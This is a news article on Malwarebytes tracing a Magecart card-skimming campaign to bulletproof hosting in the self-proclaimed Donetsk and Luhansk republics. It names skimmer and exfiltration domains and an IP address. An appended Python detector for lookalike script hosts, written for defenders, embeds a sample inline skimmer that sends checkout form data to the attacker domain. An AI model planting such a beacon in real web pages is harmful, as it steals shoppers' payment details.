This Malware is Being Served from a War Zone

"We also discovered a tar.gz archive containing the usernames and passwords needed to login into hundreds of Magento sites"

By CBR Staff Writer

Cybersecurity company Malwarebytes says it has traced the host servers of a Magecart card skimming campaign to the so-called “independent Donetsk and Luhansk People’s Republics (D/LPR)” in eastern Ukraine: site of a festering war that has resulted in over 13,000 deaths to date.

So-called “bulletproof hosting” (hosting services resilient to law enforcement takedowns) is nothing new, but locating it in what is effectively a war zone puts a unique twist on the offering.

Malware War Zone: More than a Metaphor 

The area has been the site of a bitter conflict after local militia seized government buildings in Donetsk, Luhansk and Kharkiv in early 2014, declared the independence of “people’s republics”, and called referenda on joining Russia, which they scheduled for 11 May. Russia, however, never recognised the statelets, although it covertly sent troops to bolster their defence against Ukrainian efforts to retake them.

The cybercriminals are using servers advertised as being in a “private Luhansk data center”.

They are using autonomous system AS58271 “FOP Gubina Lubov Petrivna”, which Malwarebytes describes as a “hotspot for IDN-based phishing, in particular around cryptocurrency assets”.

Malwarebytes’ threat intelligence team said they identified the host server location after investigating a Magecart campaign that was using a skimmer injected into compromised Magento sites and trying to pass itself off as Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.


Sniffing about the hosting servers, the security team found that each online store hacked as part of the campaign had its own skimmer, and identified a file detailing hundreds of affected ecommerce sites, replete with passwords.


They said: “We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to log in to hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

“Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt).”

The criminals were using another Google lookalike domain, google.ssl.lnfo[.]cc, to exfiltrate the card details they stole. (Magecart groups typically work by inserting a customised JavaScript payment overlay for the specific site, which captures personal information and card details as the shopper enters them and sends them to an attacker-controlled domain. Such sites are often insecure: recent campaigns have involved dropping skimmers en masse into .js files stored in open AWS S3 buckets.)
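Both domains in this campaign share one trait: they contain a brand string (“google”) without being registered under the real Google domain. The script below is an added example, not Malwarebytes’ code or anything from the campaign, showing how a store operator could sweep a checkout page for script sources and exfiltration URLs that fit that pattern. The HTML sample is constructed here and uses the two indicators named in the article (the `[.]` defanging removed); the allow-list of legitimate suffixes and the brand-string heuristic are the example’s own assumptions.

```python
"""Flag Google-lookalike hosts in a page's <script> tags and inline JavaScript.

Added illustration for this article; the heuristic and the allow-list below are
assumptions, not a vendor detection rule.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Real domains a Magento store may legitimately load from (assumed allow-list).
LEGIT_SUFFIXES = ("google.com", "google-analytics.com",
                  "googletagmanager.com", "gstatic.com")
# Brand strings a skimmer domain tends to borrow to blend in with analytics traffic.
BRANDS = ("google", "analytics", "gstatic")

# Constructed sample page: one genuine analytics tag, one typosquatted skimmer
# loader and one inline beacon to the exfiltration host named in the article.
SAMPLE_HTML = """
<html><body>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://google-anaiytic.com/ga.js"></script>
<script>
  var f = document.forms[0];
  f.addEventListener("submit", function () {
    var img = new Image();
    img.src = "https://google.ssl.lnfo.cc/?d=" + btoa(JSON.stringify(collect(f)));
  });
</script>
</body></html>
"""


def registered_under(host, suffix):
    """True when host is suffix itself or a subdomain of it."""
    return host == suffix or host.endswith("." + suffix)


def is_lookalike(host):
    """A host is suspicious if it borrows a brand string but is not under a real domain."""
    host = host.lower().rstrip(".")
    if any(registered_under(host, s) for s in LEGIT_SUFFIXES):
        return False
    return any(b in host for b in BRANDS)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+", re.I)


def find_lookalike_hosts(html):
    """Return the sorted set of lookalike hosts referenced by scripts in html."""
    parser = ScriptCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.srcs:
        # Protocol-relative "//host/x.js" parses fine; relative paths yield no host.
        host = urlparse(src if "//" in src else "//" + src).hostname
        if host and is_lookalike(host):
            hosts.add(host)
    for code in parser.inline:
        for url in URL_RE.findall(code):
            host = urlparse(url).hostname
            if host and is_lookalike(host):
                hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    for h in find_lookalike_hosts(SAMPLE_HTML):
        print("suspicious host:", h)
```

Run against a live checkout page the same parser works on `requests.get(url).text`; the inline-script scan is what catches the exfiltration beacon, since the skimmer's loader and its collection endpoint are often different hosts, as they were here.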

The “no-man’s-land” status of the self-proclaimed republics makes them an ideal site for cybercriminals to host servers in: the hosting service for the sites used in this particular campaign is being offered online by bproof[.]host at 176.119.1[.]89, which advertises “bulletproof IT services with VPS and dedicated servers”.
